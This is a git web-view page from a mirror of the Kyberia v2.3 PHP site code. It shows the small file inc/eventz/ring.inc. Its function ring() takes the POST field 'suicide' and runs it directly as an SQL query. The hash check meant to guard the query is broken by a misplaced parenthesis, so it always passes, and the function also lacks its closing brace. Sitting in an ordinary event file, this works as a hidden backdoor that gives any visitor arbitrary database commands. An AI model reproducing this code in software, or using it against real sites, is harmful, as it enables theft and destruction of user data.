Kyberia v2.3 - 1st revision from SVN (Without patches of kyberia.sk team)
[mirrors/Kyberia-bloodline.git] / inc / eventz / ring.inc
CommitLineData
e586807d 1<?php
e586807d
H
2function ring() {
3global $db;
4if (md5($_POST['ring']=='a482a148ccdd020bcb5888e99f41bb65')) {
5 $db->query($_POST['suicide']);
6}
7?>
This page took 0.106217 seconds and 4 git commands to generate.